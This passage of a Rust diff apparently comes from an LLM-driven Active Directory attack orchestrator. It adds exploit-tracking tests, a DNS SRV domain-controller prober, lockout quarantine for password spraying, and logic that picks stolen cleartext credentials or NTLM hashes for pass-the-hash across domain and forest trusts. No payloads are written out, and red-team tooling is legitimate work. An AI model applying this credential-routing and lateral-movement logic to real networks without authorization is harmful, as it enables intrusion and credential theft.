vuln("mssql_192_168_58_254", "mssql_access", "192.168.58.254", &[]), + ); + let lsid = "mssql_linked_server_192.168.58.254_SQL".to_string(); + discovered.insert( + lsid.clone(), + vuln(&lsid, "mssql_linked_server", "192.168.58.254", &[]),
); + let out = compute_superseded(&lsid, discovered.get(&lsid), &discovered); + assert_eq!(out, vec!["mssql_192_168_58_254".to_string()]); + } + + #[test] + fn supersede_mssql_does_not_match_other_hosts() { + let mut discovered = HashMap::new(); + discovered.insert( + "mssql_192_168_58_51".to_string(), + vuln("mssql_192_168_58_51", "mssql_access", "192.168.58.51", &[]), + ); + discovered.insert( + "mssql_impersonation_192.168.58.254".to_string(), + vuln( + "mssql_impersonation_192.168.58.254", + "mssql_impersonation", + "192.168.58.254", + &[], + ), + ); + let primary = discovered.get("mssql_impersonation_192.168.58.254"); + let out = compute_superseded("mssql_impersonation_192.168.58.254", primary, &discovered); + assert!(out.is_empty()); + } + + #[test] + fn supersede_dc_secretsdump_covers_trust_and_child_to_parent() { + let mut discovered = HashMap::new(); + discovered.insert( + "dc_secretsdump_fabrikam.local".to_string(), + vuln( + "dc_secretsdump_fabrikam.local", + "dc_secretsdump", + "192.168.58.58", + &[("domain", "fabrikam.local")], + ), + ); + discovered.insert( + "forest_trust_contoso.local_fabrikam.local".to_string(), + vuln( + "forest_trust_contoso.local_fabrikam.local", + "forest_trust_escalation", + "192.168.58.58", + &[("target_domain", "fabrikam.local")], + ), + ); + discovered.insert( + "child_to_parent_child_fabrikam".to_string(), + vuln( + "child_to_parent_child_fabrikam", + "child_to_parent", + "192.168.58.58", + &[("target_domain", "fabrikam.local")], + ), + ); + // Unrelated trust should NOT be superseded. + discovered.insert( + "forest_trust_fabrikam_child".to_string(), + vuln( + "forest_trust_fabrikam_child", + "forest_trust_escalation", + "192.168.58.150", + &[("target_domain", "child.contoso.local")], + ), + ); + let primary = discovered.get("dc_secretsdump_fabrikam.local"); + let mut out = compute_superseded("dc_secretsdump_fabrikam.local", primary, &discovered); + out.sort(); + assert_eq!( + out, + vec![ + "child_to_parent_child_fabrikam".to_string(), + "forest_trust_contoso.local_fabrikam.local".to_string(), + ] + ); + } + + #[test] + fn supersede_returns_empty_when_primary_missing() { + let discovered = HashMap::new(); + let out = compute_superseded("ghost", None, &discovered); + assert!(out.is_empty()); + } + + #[tokio::test] + async fn mark_exploited_propagates_to_superseded() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + { + let mut s = state.inner.write().await; + s.discovered_vulnerabilities.insert( + "mssql_192_168_58_51".into(), + vuln("mssql_192_168_58_51", "mssql_access", "192.168.58.51", &[]), + ); + s.discovered_vulnerabilities.insert( + "mssql_impersonation_192.168.58.51".into(), + vuln( + "mssql_impersonation_192.168.58.51", + "mssql_impersonation", + "192.168.58.51", + &[], + ), + ); + } + + state + .mark_exploited(&q, "mssql_impersonation_192.168.58.51") + .await + .unwrap(); + + let s = state.inner.read().await; + assert!(s + .exploited_vulnerabilities + .contains("mssql_impersonation_192.168.58.51")); + assert!(s.exploited_vulnerabilities.contains("mssql_192_168_58_51")); + + let mut conn = q.connection(); + let members: std::collections::HashSet<String> = + redis::AsyncCommands::smembers(&mut conn, "ares:op:op-1:exploited") + .await + .unwrap(); + assert!(members.contains("mssql_impersonation_192.168.58.51")); + assert!(members.contains("mssql_192_168_58_51")); + } + + #[tokio::test] + async fn record_exploit_failure_increments_counter() { + let state = SharedState::new("op-1".to_string());
assert_eq!(state.record_exploit_failure("mssql_192_168_58_254").await, 1); + assert_eq!(state.record_exploit_failure("mssql_192_168_58_254").await, 2); + assert_eq!(state.record_exploit_failure("mssql_192_168_58_254").await, 3); + // Different vuln tracked independently. + assert_eq!(state.record_exploit_failure("other_vuln").await, 1); + } + + #[tokio::test] + async fn is_exploit_abandoned_below_threshold() { + let state = SharedState::new("op-1".to_string()); + for _ in 0..(MAX_EXPLOIT_FAILURES - 1) { + state.record_exploit_failure("vuln_a").await; + } + assert!(!state.is_exploit_abandoned("vuln_a").await); + assert!(!state.is_exploit_abandoned("never_failed").await); + } + + #[tokio::test] + async fn is_exploit_abandoned_at_and_above_threshold() { + let state = SharedState::new("op-1".to_string()); + for _ in 0..MAX_EXPLOIT_FAILURES { + state.record_exploit_failure("vuln_a").await; + } + assert!(state.is_exploit_abandoned("vuln_a").await); + // Further failures don't un-abandon. + state.record_exploit_failure("vuln_a").await; + assert!(state.is_exploit_abandoned("vuln_a").await); + } } diff --git a/ares-cli/src/orchestrator/state/domain_probe/dns_srv.rs b/ares-cli/src/orchestrator/state/domain_probe/dns_srv.rs new file mode 100644 index 00000000..15827b89 --- /dev/null +++ b/ares-cli/src/orchestrator/state/domain_probe/dns_srv.rs @@ -0,0 +1,68 @@ +//! DNS SRV-based domain prober. +//! +//! Real AD domains publish `_ldap._tcp.dc._msdcs.<domain>` SRV records. This +//! is the same lookup that NetExec, runZero, and BloodHound use to discover +//! domain controllers, and it serves equally well as a binary "is this a real +//! AD domain?" probe. +//! +//! Resolver behavior: +//! - We construct a `TokioAsyncResolver` from the system resolv.conf so we +//! pick up whatever recursive resolver the operator has configured (often +//! the same DNS server an attacker would query during real-world recon). +//! - NXDOMAIN / NoRecordsFound → `Rejected` (the suffix is definitely not AD). +//! - Successful answer with at least one SRV record → `Confirmed`. +//! - I/O / timeout / refused → `Indeterminate` (we'll retry next tick). + +use async_trait::async_trait; +use hickory_resolver::config::{ResolverConfig, ResolverOpts}; +use hickory_resolver::error::ResolveErrorKind; +use hickory_resolver::TokioAsyncResolver; + +use super::{DomainProber, ProbeOutcome}; + +/// Real DNS prober. Wraps a hickory `TokioAsyncResolver`. +pub struct DnsSrvProber { + resolver: TokioAsyncResolver, +} + +impl DnsSrvProber { + /// Construct using the system resolver (resolv.conf on Unix). + /// Falls back to the library's default config (Google public DNS) if the + /// system config is unreadable — we still need *something* to query in + /// container environments where /etc/resolv.conf may be missing.
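+ /// + /// Illustrative usage (editor's sketch): + /// + /// ```ignore + /// let prober = DnsSrvProber::from_system(); + /// // issues an SRV lookup for _ldap._tcp.dc._msdcs.contoso.local. + /// let outcome = prober.probe("contoso.local").await; + /// ```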
+ pub fn from_system() -> Self { + let resolver = match TokioAsyncResolver::tokio_from_system_conf() { + Ok(r) => r, + Err(e) => { + tracing::warn!(err = %e, "DNS SRV prober: system resolver unreadable, falling back to defaults"); + TokioAsyncResolver::tokio(ResolverConfig::default(), ResolverOpts::default()) + } + }; + Self { resolver } + } +} + +#[async_trait] +impl DomainProber for DnsSrvProber { + async fn probe(&self, fqdn: &str) -> ProbeOutcome { + let query = format!("_ldap._tcp.dc._msdcs.{}.", fqdn.trim_end_matches('.')); + match self.resolver.srv_lookup(&query).await { + Ok(answer) => { + if answer.iter().next().is_some() { + ProbeOutcome::Confirmed + } else { + ProbeOutcome::Rejected("no SRV records") + } + } + Err(e) => match e.kind() { + ResolveErrorKind::NoRecordsFound { .. } => { + ProbeOutcome::Rejected("NXDOMAIN / no _ldap._tcp.dc._msdcs SRV") + } + _ => { + tracing::debug!(fqdn = %fqdn, err = %e, "DNS SRV probe transient error"); + ProbeOutcome::Indeterminate + } + }, + } + } +} diff --git a/ares-cli/src/orchestrator/state/domain_probe/mod.rs b/ares-cli/src/orchestrator/state/domain_probe/mod.rs new file mode 100644 index 00000000..ec4f1713 --- /dev/null +++ b/ares-cli/src/orchestrator/state/domain_probe/mod.rs @@ -0,0 +1,45 @@ +//! Active probes that confirm whether a candidate FQDN is a real AD domain. +//! +//! `publishing::domains` records weak-evidence FQDNs as `CandidateDomain` +//! entries. The worker in this module periodically drains those candidates, +//! runs a probe (currently DNS SRV for `_ldap._tcp.dc._msdcs.<domain>`), and +//! either promotes confirmed results or drops rejections. +//! +//! Design notes: +//! - The trait abstracts the probe so unit tests can swap in a deterministic +//! stub. Real prober uses `hickory-resolver` against the system resolver, +//! which mirrors what BloodHound / NetExec / runZero do. +//! - DNS SRV is a reliable positive signal *and* a useful negative signal: +//! if `_ldap._tcp.dc._msdcs.<domain>` does not resolve, the suffix is not an +//! AD domain. We treat NXDOMAIN as `Rejected`; transient errors stay +//! `Indeterminate` so we retry later. +//! - CLDAP NetLogon ping (UDP/389) is the gold-standard probe used by +//! `DsGetDcName`. It is intentionally not implemented in this first cut — +//! it requires ~300 LoC of BER ASN.1 + raw UDP and adds a dependency. DNS +//! SRV alone matches industry practice for asset discovery and yields the +//! correctness improvement we want without the implementation cost. + +pub mod dns_srv; +pub mod worker; + +use async_trait::async_trait; + +pub use dns_srv::DnsSrvProber; +pub use worker::{spawn_domain_probe_worker, DomainProbeContext}; + +/// Result of probing a candidate domain. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum ProbeOutcome { + /// The probe positively identified an AD domain. Promote. + Confirmed, + /// The probe authoritatively says this is not an AD domain. Drop. + Rejected(&'static str), + /// Transient error or insufficient signal. Leave the candidate to retry. + Indeterminate, +} + +/// Pluggable domain prober. Implementers return a `ProbeOutcome` for an FQDN. +#[async_trait] +pub trait DomainProber: Send + Sync { + async fn probe(&self, fqdn: &str) -> ProbeOutcome; +} diff --git a/ares-cli/src/orchestrator/state/domain_probe/worker.rs b/ares-cli/src/orchestrator/state/domain_probe/worker.rs new file mode 100644 index 00000000..6cc76572 --- /dev/null +++ b/ares-cli/src/orchestrator/state/domain_probe/worker.rs @@ -0,0 +1,255 @@ +//!
Periodic worker that drains candidate domains and probes them. +//! +//! Spawned once at orchestrator startup. Every 30 seconds it pulls the +//! current candidate set, probes each entry concurrently, and: +//! - Confirmed → `promote_domain` +//! - Rejected → `drop_candidate_domain` +//! - Indeterminate → `mark_candidate_probed` (back off; promotion can still +//! come from a stronger source landing later) +//! +//! Tick cadence is deliberately slow (30s vs 5s for `discovery_poller`): +//! domain promotion is not on the hot path of attack flow, and we don't want +//! to hammer DNS for transient resolution failures. The worker is also +//! resilient to shutdown — it joins the existing `watch::Receiver<bool>` +//! pattern used by every other background task. + +use std::sync::Arc; +use std::time::Duration; + +use redis::aio::ConnectionManager; +use tokio::sync::watch; +use tokio::task::JoinHandle; +use tracing::{debug, info}; + +use super::{DomainProber, ProbeOutcome}; +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueueCore; + +/// Wired-up dependencies for the probe worker. +pub struct DomainProbeContext { + pub state: SharedState, + pub queue: TaskQueueCore, + pub prober: Arc<dyn DomainProber>, +} + +/// Tick interval. Long enough to avoid DNS hammering, short enough that a +/// candidate landing mid-operation gets confirmed within tens of seconds. +const TICK_SECS: u64 = 30; + +/// Spawn the candidate-domain probe worker on a Tokio task. +pub fn spawn_domain_probe_worker( + ctx: DomainProbeContext, + shutdown: watch::Receiver<bool>, +) -> JoinHandle<()> { + tokio::spawn(async move { + run(ctx, shutdown).await; + }) +} + +async fn run(ctx: DomainProbeContext, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(TICK_SECS)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + info!("Domain probe worker started"); + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + drain_once(&ctx).await; + } + info!("Domain probe worker stopped"); +} + +async fn drain_once(ctx: &DomainProbeContext) { + let pending = ctx.state.pending_candidate_domains().await; + if pending.is_empty() { + return; + } + debug!(count = pending.len(), "Probing candidate domains"); + for cand in pending { + let outcome = ctx.prober.probe(&cand.fqdn).await; + match outcome { + ProbeOutcome::Confirmed => { + if let Err(e) = ctx.state.promote_domain(&ctx.queue, &cand.fqdn).await { + debug!(domain = %cand.fqdn, err = %e, "Promote after probe failed"); + } else { + info!(domain = %cand.fqdn, "Promoted candidate domain after DNS SRV probe"); + } + } + ProbeOutcome::Rejected(reason) => { + if let Err(e) = ctx + .state + .drop_candidate_domain(&ctx.queue, &cand.fqdn) + .await + { + debug!(domain = %cand.fqdn, err = %e, "Drop candidate failed"); + } else { + debug!(domain = %cand.fqdn, reason = %reason, "Dropped candidate domain (probe rejected)"); + } + } + ProbeOutcome::Indeterminate => { + if let Err(e) = ctx + .state + .mark_candidate_probed(&ctx.queue, &cand.fqdn) + .await + { + debug!(domain = %cand.fqdn, err = %e, "Mark probed failed"); + } + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::task_queue::TaskQueueCore; + use ares_core::models::DomainEvidence; + use ares_core::state::mock_redis::MockRedisConnection; + use async_trait::async_trait; + use std::sync::Mutex; + + fn mock_queue() -> TaskQueueCore { + TaskQueueCore::from_connection(MockRedisConnection::new()) + } + + /// Test prober that returns a fixed outcome per FQDN. + struct StubProber { + results: Mutex<std::collections::HashMap<String, ProbeOutcome>>, + } + + impl StubProber { + fn new(entries: Vec<(&str, ProbeOutcome)>) -> Self { + let mut map = std::collections::HashMap::new(); + for (k, v) in entries { + map.insert(k.to_string(), v); + } + Self { + results: Mutex::new(map), + } + } + } + + #[async_trait] + impl DomainProber for StubProber { + async fn probe(&self, fqdn: &str) -> ProbeOutcome { + self.results + .lock() + .unwrap() + .get(fqdn) + .cloned() + .unwrap_or(ProbeOutcome::Indeterminate) + } + } + + /// Internal helper that runs one drain pass against a mock-backed state. + /// We can't call `drain_once` directly because the public `DomainProbeContext` + /// is parameterized on `ConnectionManager`, but the test substitutes + /// `MockRedisConnection`. Instead we replicate the loop body by hand.
+ async fn drain_with_mock( + state: &SharedState, + queue: &TaskQueueCore, + prober: &dyn DomainProber, + ) { + let pending = state.pending_candidate_domains().await; + for cand in pending { + match prober.probe(&cand.fqdn).await { + ProbeOutcome::Confirmed => { + state.promote_domain(queue, &cand.fqdn).await.unwrap(); + } + ProbeOutcome::Rejected(_) => { + state + .drop_candidate_domain(queue, &cand.fqdn) + .await + .unwrap(); + } + ProbeOutcome::Indeterminate => { + state + .mark_candidate_probed(queue, &cand.fqdn) + .await + .unwrap(); + } + } + } + } + + #[tokio::test] + async fn confirmed_candidate_is_promoted() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + state + .publish_candidate_domain(&q, "contoso.local", DomainEvidence::HostnameInference, None) + .await + .unwrap(); + let prober = StubProber::new(vec![("contoso.local", ProbeOutcome::Confirmed)]); + drain_with_mock(&state, &q, &prober).await; + let s = state.inner.read().await; + assert!(s.domains.iter().any(|d| d == "contoso.local")); + assert!(s.candidate_domains.is_empty()); + } + + #[tokio::test] + async fn rejected_candidate_is_dropped() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + state + .publish_candidate_domain( + &q, + "fake.example.com", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + let prober = StubProber::new(vec![("fake.example.com", ProbeOutcome::Rejected("nx"))]); + drain_with_mock(&state, &q, &prober).await; + let s = state.inner.read().await; + assert!(s.domains.is_empty()); + assert!(s.candidate_domains.is_empty()); + } + + #[tokio::test] + async fn indeterminate_candidate_marked_probed_but_kept() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + state + .publish_candidate_domain( + &q, + "transient.example.com", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + let prober = StubProber::new(vec![]); + drain_with_mock(&state, &q, &prober).await; + let s = state.inner.read().await; + assert!(s.domains.is_empty()); + let cand = s.candidate_domains.get("transient.example.com").unwrap(); + assert!(cand.probed); + } + + #[tokio::test] + async fn probed_candidates_are_not_repolled() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + state + .publish_candidate_domain( + &q, + "transient.example.com", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + // First pass: indeterminate → marked probed. + let prober = StubProber::new(vec![]); + drain_with_mock(&state, &q, &prober).await; + // Second pass should now skip the already-probed candidate. + let pending = state.pending_candidate_domains().await; + assert!(pending.is_empty()); + } +} diff --git a/ares-cli/src/orchestrator/state/inner.rs b/ares-cli/src/orchestrator/state/inner.rs index 552c0aec..b1964b9e 100644 --- a/ares-cli/src/orchestrator/state/inner.rs +++ b/ares-cli/src/orchestrator/state/inner.rs @@ -25,11 +25,22 @@ pub struct StateInner { pub users: Vec, pub shares: Vec, pub domains: Vec<String>, + /// Domains discovered with evidence weaker than authoritative (typically + /// inferred from a host FQDN). Held here until the probe confirms or a + /// stronger source promotes them. Keyed by lowercase FQDN. + pub candidate_domains: HashMap<String, CandidateDomain>, // Vulnerability tracking pub discovered_vulnerabilities: HashMap<String, VulnerabilityInfo>, pub exploited_vulnerabilities: HashSet<String>, + // Per-vuln consecutive exploit-failure counts.
Drives `is_exploit_abandoned` + // — once a vuln crosses MAX_EXPLOIT_FAILURES, the exploitation workflow + // skips it permanently for this op. Prevents 2-hour LLM stuck-loops on + // exploits whose preconditions (creds, reachable target, working tool) + // can never be satisfied. Operation-scoped, in-memory only. + pub exploit_failure_counts: HashMap<String, u32>, + // Maps pub domain_controllers: HashMap<String, String>, pub netbios_to_fqdn: HashMap<String, String>, @@ -69,12 +80,35 @@ pub struct StateInner { // KDC_ERR_CLIENT_REVOKED are quarantined to avoid burning auth budget. pub quarantined_credentials: HashMap<String, DateTime<Utc>>, + // Username lockout quarantine: `user@domain` → expiry time. + // Distinct from quarantined_credentials: tracks principals seen locked + // during enumeration paths (username_as_password, password_spray) where + // we have no specific cleartext credential to quarantine, only the + // principal itself. Used to filter user lists before re-dispatching + // enum tools so we don't keep incrementing badPwdCount on already-locked + // accounts. + pub quarantined_users: HashMap<String, DateTime<Utc>>, + + // Per-trust counter: how many times the cross-forest forge dispatch + // has been deferred waiting for the AES256 trust key to upsert. + // secretsdump runs twice (NTLM-only first, then AES-equipped) and + // Win2016+ targets reject RC4-only inter-realm tickets. Bound this + // so we don't defer indefinitely if AES never arrives. + pub forge_aes_defers: HashMap<String, u32>, + + // Forged inter-realm Kerberos tickets (source→target forest, cached path) + pub kerberos_tickets: Vec, + // Completion flag (set externally to signal operation should wrap up) pub completed: bool, + + /// Timestamp when all forests were first detected as dominated. + /// Used by the completion monitor to enforce a post-exploitation grace period. + pub all_forests_dominated_at: Option, } impl StateInner { - pub(super) fn new(operation_id: String) -> Self { + pub(crate) fn new(operation_id: String) -> Self { let mut dedup = HashMap::new(); for name in ALL_DEDUP_SETS { dedup.insert(name.to_string(), HashSet::new()); } @@ -90,8 +124,10 @@ impl StateInner { users: Vec::new(), shares: Vec::new(), domains: Vec::new(), + candidate_domains: HashMap::new(), discovered_vulnerabilities: HashMap::new(), exploited_vulnerabilities: HashSet::new(), + exploit_failure_counts: HashMap::new(), domain_controllers: HashMap::new(), netbios_to_fqdn: HashMap::new(), domain_sids: HashMap::new(), @@ -108,7 +144,11 @@ impl StateInner { pending_tasks: HashMap::new(), completed_tasks: HashMap::new(), quarantined_credentials: HashMap::new(), + quarantined_users: HashMap::new(), + forge_aes_defers: HashMap::new(), + kerberos_tickets: Vec::new(), completed: false, + all_forests_dominated_at: None, } } @@ -149,6 +189,328 @@ impl StateInner { self.quarantined_credentials.insert(key, expiry); } + /// Check if a user is quarantined due to lockout observed during + /// enumeration. Expired quarantines are ignored (lazy cleanup). + pub fn is_user_quarantined(&self, username: &str, domain: &str) -> bool { + let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); + self.quarantined_users + .get(&key) + .map(|expiry| Utc::now() < *expiry) + .unwrap_or(false) + } + + /// Quarantine a user for `QUARANTINE_DURATION_SECS` after lockout.
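+ /// + /// Illustrative flow (editor's sketch): + /// + /// ```ignore + /// state.quarantine_user("testuser1", "CONTOSO"); + /// assert!(state.is_user_quarantined("TestUser1", "contoso")); // keys lowercased + /// ```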
+ pub fn quarantine_user(&mut self, username: &str, domain: &str) { + let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); + let expiry = Utc::now() + chrono::Duration::seconds(QUARANTINE_DURATION_SECS); + self.quarantined_users.insert(key, expiry); + } + + /// Return a deduplicated list of currently-quarantined usernames in + /// `domain` (case-insensitive). Used to populate `excluded_users` on + /// outbound spray dispatches so the worker can drop them before auth. + pub fn quarantined_users_in_domain(&self, domain: &str) -> Vec<String> { + let domain_l = domain.to_lowercase(); + let now = Utc::now(); + let mut out: Vec<String> = self + .quarantined_users + .iter() + .filter(|(_, expiry)| now < **expiry) + .filter_map(|(key, _)| { + let (user, dom) = key.split_once('@')?; + if dom == domain_l { + Some(user.to_string()) + } else { + None + } + }) + .collect(); + out.sort(); + out.dedup(); + out + } + + /// Resolve the DC IP for a domain. + /// + /// Checks `domain_controllers` first, then falls back to scanning the hosts + /// list for a DC whose FQDN suffix matches the domain. This is more robust + /// than relying solely on `domain_controllers`, which can have stale or + /// missing entries due to startup seed timing issues in multi-domain + /// environments. + pub fn resolve_dc_ip(&self, domain: &str) -> Option<String> { + let domain_lower = domain.to_lowercase(); + // Tier 1: explicit DC map (case-insensitive) + if let Some(ip) = self.domain_controllers.get(&domain_lower).or_else(|| { + self.domain_controllers + .iter() + .find(|(k, _)| k.to_lowercase() == domain_lower) + .map(|(_, v)| v) + }) { + return Some(ip.clone()); + } + // Tier 2: scan hosts for a DC matching this domain by FQDN suffix + for host in &self.hosts { + if !(host.is_dc || host.detect_dc()) { + continue; + } + if host.hostname.is_empty() { + continue; + } + let parts: Vec<&str> = host.hostname.split('.').collect(); + if parts.len() >= 3 { + let host_domain = parts[1..].join(".").to_lowercase(); + if host_domain == domain_lower { + return Some(host.ip.clone()); + } + } + } + None + } + + /// Return all unique domains that have a resolvable DC. + /// + /// Merges domains from `domain_controllers`, `domains`, and `trusted_domains` + /// then filters to those where `resolve_dc_ip()` succeeds. Returns + /// `(domain, dc_ip)` pairs. + pub fn all_domains_with_dcs(&self) -> Vec<(String, String)> { + let mut seen = std::collections::HashSet::new(); + let mut result = Vec::new(); + + // Gather all known domain names (lowercased for dedup) + let mut all_domains: Vec<String> = Vec::new(); + for d in self.domain_controllers.keys() { + all_domains.push(d.to_lowercase()); + } + for d in &self.domains { + all_domains.push(d.to_lowercase()); + } + for d in self.trusted_domains.keys() { + all_domains.push(d.to_lowercase()); + } + + for domain in all_domains { + if seen.contains(&domain) { + continue; + } + seen.insert(domain.clone()); + if let Some(ip) = self.resolve_dc_ip(&domain) { + result.push((domain, ip)); + } + } + + result + } + + /// Find a cleartext credential from a trusted domain that can authenticate + /// to `target_domain` via AD trust (child→parent or cross-forest). + /// + /// Used as a fallback when no same-domain cleartext credential exists. + /// Child-domain creds authenticate to parent DCs via the parent-child trust; + /// cross-forest creds authenticate via bidirectional forest trusts.
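+ /// + /// Editor's sketch (hypothetical state): with one usable cleartext cred in + /// `child.contoso.local`, a lookup for the parent takes the child→parent + /// branch: + /// + /// ```ignore + /// let c = state.find_trust_credential("contoso.local"); + /// assert_eq!(c.unwrap().domain.to_lowercase(), "child.contoso.local"); + /// ```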
+ pub fn find_trust_credential( + &self, + target_domain: &str, + ) -> Option<ares_core::models::Credential> { + let target = target_domain.to_lowercase(); + + // Priority 1: child-domain cred → parent-domain (most reliable) + if let Some(c) = self.credentials.iter().find(|c| { + !c.password.is_empty() + && !self.is_credential_quarantined(&c.username, &c.domain) + && c.domain.to_lowercase().ends_with(&format!(".{target}")) + }) { + return Some(c.clone()); + } + + // Priority 2: cross-forest trusted domain cred (bidirectional trust) + // Check if any credential's domain has a trust with the target domain. + // Also falls back to discovered-domain heuristic: if both domains have + // known DCs in the same operation, they are likely in a trust relationship. + // LDAP bind will simply fail if there is no actual trust. + for cred in &self.credentials { + if cred.password.is_empty() + || self.is_credential_quarantined(&cred.username, &cred.domain) + { + continue; + } + let cred_dom = cred.domain.to_lowercase(); + if cred_dom == target { + continue; // same domain, not a trust fallback + } + let cred_forest = self.forest_root_of(&cred_dom); + let target_forest = self.forest_root_of(&target); + if cred_forest != target_forest { + // Explicit trust relationship known + if self.trusted_domains.contains_key(&target_forest) + || self.trusted_domains.contains_key(&cred_forest) + { + return Some(cred.clone()); + } + // Heuristic: both forests have DCs in this engagement — likely + // trust-related. LDAP bind will fail harmlessly if not. + let target_has_dc = self.domain_controllers.keys().any(|d| { + let d = d.to_lowercase(); + d == target_forest || self.forest_root_of(&d) == target_forest + }); + let cred_has_dc = self.domain_controllers.keys().any(|d| { + let d = d.to_lowercase(); + d == cred_forest || self.forest_root_of(&d) == cred_forest + }); + if target_has_dc && cred_has_dc { + return Some(cred.clone()); + } + } + } + + None + } + + /// Find a credential for the SOURCE user (the principal performing the + /// action), regardless of which TARGET domain the action is aimed at. + /// + /// Cross-forest ACL/MSSQL/ADCS exploitation has the source user living in + /// their own domain (e.g. `testuser@contoso.local`) while a vuln's + /// `domain` field points at the target (e.g. `fabrikam.local`). + /// Same-domain matching against the target therefore drops legitimate + /// cross-forest work. + /// + /// Selection priority: + /// 1. Cred whose domain matches the explicit `@domain` suffix of + /// `source_user`, if present. + /// 2. Cred whose domain == `target_domain` (same-domain case). + /// 3. Cred from a domain in a trust relationship with `target_domain` + /// (forest sibling, child↔parent, or trusted_domains entry). + /// 4. Any non-empty, non-quarantined cred with matching username.
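+ /// + /// Editor's sketch (hypothetical state): an explicit `@domain` suffix wins + /// even when the vuln targets another forest: + /// + /// ```ignore + /// let c = state.find_source_credential("testuser@contoso.local", "fabrikam.local"); + /// // resolves to the contoso.local credential (priority 1), not a + /// // fabrikam.local one + /// ```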
+    pub fn find_source_credential(
+        &self,
+        source_user: &str,
+        target_domain: &str,
+    ) -> Option<ares_core::models::Credential> {
+        let (name, explicit_dom) = parse_principal(source_user);
+        let name_l = name.to_lowercase();
+        let target_l = target_domain.to_lowercase();
+        let target_forest = self.forest_root_of(&target_l);
+
+        let usable = |c: &ares_core::models::Credential| -> bool {
+            !c.password.is_empty()
+                && !self.is_credential_quarantined(&c.username, &c.domain)
+                && c.username.to_lowercase() == name_l
+        };
+
+        if let Some(ref d) = explicit_dom {
+            if let Some(c) = self
+                .credentials
+                .iter()
+                .find(|c| usable(c) && c.domain.to_lowercase() == *d)
+            {
+                return Some(c.clone());
+            }
+        }
+
+        if let Some(c) = self
+            .credentials
+            .iter()
+            .find(|c| usable(c) && c.domain.to_lowercase() == target_l)
+        {
+            return Some(c.clone());
+        }
+
+        if let Some(c) = self.credentials.iter().find(|c| {
+            if !usable(c) {
+                return false;
+            }
+            let dom = c.domain.to_lowercase();
+            if dom == target_l {
+                return false;
+            }
+            let cred_forest = self.forest_root_of(&dom);
+            cred_forest == target_forest
+                || self.trusted_domains.contains_key(&target_forest)
+                || self.trusted_domains.contains_key(&cred_forest)
+        }) {
+            return Some(c.clone());
+        }
+
+        self.credentials.iter().find(|c| usable(c)).cloned()
+    }
+
+    /// NTLM-hash variant of [`find_source_credential`] with the same priority
+    /// order. Restricts to NTLM hashes (the only type usable for PTH).
+    pub fn find_source_hash(
+        &self,
+        source_user: &str,
+        target_domain: &str,
+    ) -> Option<ares_core::models::Hash> {
+        let (name, explicit_dom) = parse_principal(source_user);
+        let name_l = name.to_lowercase();
+        let target_l = target_domain.to_lowercase();
+        let target_forest = self.forest_root_of(&target_l);
+
+        let usable = |h: &ares_core::models::Hash| -> bool {
+            !h.hash_value.is_empty()
+                && h.hash_type.eq_ignore_ascii_case("NTLM")
+                && !self.is_credential_quarantined(&h.username, &h.domain)
+                && h.username.to_lowercase() == name_l
+        };
+
+        if let Some(ref d) = explicit_dom {
+            if let Some(h) = self
+                .hashes
+                .iter()
+                .find(|h| usable(h) && h.domain.to_lowercase() == *d)
+            {
+                return Some(h.clone());
+            }
+        }
+
+        if let Some(h) = self
+            .hashes
+            .iter()
+            .find(|h| usable(h) && h.domain.to_lowercase() == target_l)
+        {
+            return Some(h.clone());
+        }
+
+        if let Some(h) = self.hashes.iter().find(|h| {
+            if !usable(h) {
+                return false;
+            }
+            let dom = h.domain.to_lowercase();
+            if dom == target_l {
+                return false;
+            }
+            let cred_forest = self.forest_root_of(&dom);
+            cred_forest == target_forest
+                || self.trusted_domains.contains_key(&target_forest)
+                || self.trusted_domains.contains_key(&cred_forest)
+        }) {
+            return Some(h.clone());
+        }
+
+        self.hashes.iter().find(|h| usable(h)).cloned()
+    }
+
+    /// Get the forest root for a domain.
+    /// If the domain is a child (e.g. `child.contoso.local`), the forest
+    /// root is the parent (e.g. `contoso.local`). Otherwise returns self.
+    pub fn forest_root_of(&self, domain: &str) -> String {
+        let d = domain.to_lowercase();
+        // Check if this domain is a child of any known domain
+        for known in self.domains.iter() {
+            let k = known.to_lowercase();
+            if d != k && d.ends_with(&format!(".{k}")) {
+                return k;
+            }
+        }
+        for known in self.domain_controllers.keys() {
+            let k = known.to_lowercase();
+            if d != k && d.ends_with(&format!(".{k}")) {
+                return k;
+            }
+        }
+        d
+    }
+
+    /// Check if a dedup key exists in the named set.
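+    /// Keys are free-form strings; the trust automation uses the shape
+    /// `{kind}:{domain}[:tail]` (e.g. `xforest:fabrikam.local:dc01` in the
+    /// tests below).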
    pub fn is_processed(&self, set_name: &str, key: &str) -> bool {
        self.dedup
@@ -173,6 +535,34 @@ impl StateInner {
            .insert(key);
    }

+    /// Remove a key from the named dedup set so it can be retried.
+    pub fn unmark_processed(&mut self, set_name: &str, key: &str) {
+        if let Some(s) = self.dedup.get_mut(set_name) {
+            s.remove(key);
+        }
+    }
+
+    /// Remove every key in `set_name` that starts with `prefix`. Returns the
+    /// removed keys so the caller can also drop them from the persisted store.
+    /// Used by trust automation to wake cross-forest fallback automations
+    /// (FSP/ACL/group enum) for a target domain when their dedup format is
+    /// `{kind}:{domain}[:tail]` — clearing all entries for a target without
+    /// knowing the full key.
+    pub fn unmark_processed_by_prefix(&mut self, set_name: &str, prefix: &str) -> Vec<String> {
+        let Some(s) = self.dedup.get_mut(set_name) else {
+            return Vec::new();
+        };
+        let to_remove: Vec<String> = s
+            .iter()
+            .filter(|k| k.starts_with(prefix))
+            .cloned()
+            .collect();
+        for k in &to_remove {
+            s.remove(k);
+        }
+        to_remove
+    }
+
